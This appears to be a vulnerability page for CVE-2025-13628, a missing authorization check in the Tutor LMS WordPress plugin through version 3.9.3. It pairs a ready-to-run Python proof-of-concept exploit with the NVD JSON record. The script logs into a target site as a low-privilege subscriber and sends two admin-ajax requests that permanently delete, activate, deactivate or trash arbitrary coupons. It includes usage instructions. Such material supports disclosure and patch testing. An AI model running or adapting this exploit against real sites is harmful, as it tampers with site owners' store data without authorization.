CVE-2025-13628

import requests import sys from urllib.parse import urljoin # CVE-2025-13628 PoC - Tutor LMS Authorization Bypass # Affected: Tutor LMS <= 3.9.3 def exploit_coupon_deletion(target_url, coupon_id, action='delete'): """ Exploit unauthorized coupon manipulation via missing capability check. Args: target_url: Target WordPress site URL coupon_id: ID of coupon to manipulate action: Operation to perform (delete, activate, deactivate, trash) """ session = requests.Session() # Login as subscriber (low-privilege user) login_url = urljoin(target_url, 'wp-login.php') login_data = { 'log': 'subscriber_username', 'pwd': 'subscriber_password', 'wp-submit': 'Log In', 'redirect_to': target_url } login_response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print('[-] Login failed') return False print('[+] Login successful as subscriber') # Exploit the authorization bypass exploit_url = urljoin(target_url, 'wp-admin/admin-ajax.php') # Method 1: bulk_action_handler exploitation exploit_data = { 'action': 'tutor_bulk_action_handler', 'bulk_action': action, 'coupon_ids[]': coupon_id } response = session.post(exploit_url, data=exploit_data) if response.status_code == 200: print(f'[+] Coupon {coupon_id} {action} request sent') # Method 2: coupon_permanent_delete exploitation (for deletion) if action == 'delete': delete_data = { 'action': 'tutor_coupon_permanent_delete', 'coupon_id': coupon_id } delete_response = session.post(exploit_url, data=delete_data) print(f'[+] Permanent delete request sent for coupon {coupon_id}') return True if __name__ == '__main__': if len(sys.argv) < 3: print(f'Usage: python {sys.argv[0]} <target_url> <coupon_id>') print('Example: python exploit.py http://target.com/ 123') sys.exit(1) target = sys.argv[1] coupon_id = sys.argv[2] exploit_coupon_deletion(target, coupon_id, 'delete')

{"cve": {"id": "CVE-2025-13628", "sourceIdentifier": "[email protected]", "published": "2026-01-09T08:15:56.660", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized modification and deletion of data due to a missing capability check on the 'bulk_action_handler' and 'coupon_permanent_delete' functions in all versions up to, and including, 3.9.3. This makes it possible for authenticated attackers, with subscriber level access and above, to delete, activate, deactivate, or trash arbitrary coupons."}, {"lang": "es", "value": "La solución de eLearning y cursos en línea Tutor LMS plugin para WordPress es vulnerable a la modificación y eliminación no autorizadas de datos debido a una verificación de capacidad faltante en las funciones 'bulk_action_handler' y 'coupon_permanent_delete' en todas las versiones hasta la versión, e incluyendo, 3.9.3. Esto hace posible que atacantes autenticados, con acceso de nivel de suscriptor y superior, eliminen, activen, desactiven o envíen a la papelera cupones arbitrarios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3422766/tutor/trunk/ecommerce/CouponController.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/46f71f7b-7326-47b6-a23a-68a40f5bb56b?source=cve", "source": "[email protected]"}]}}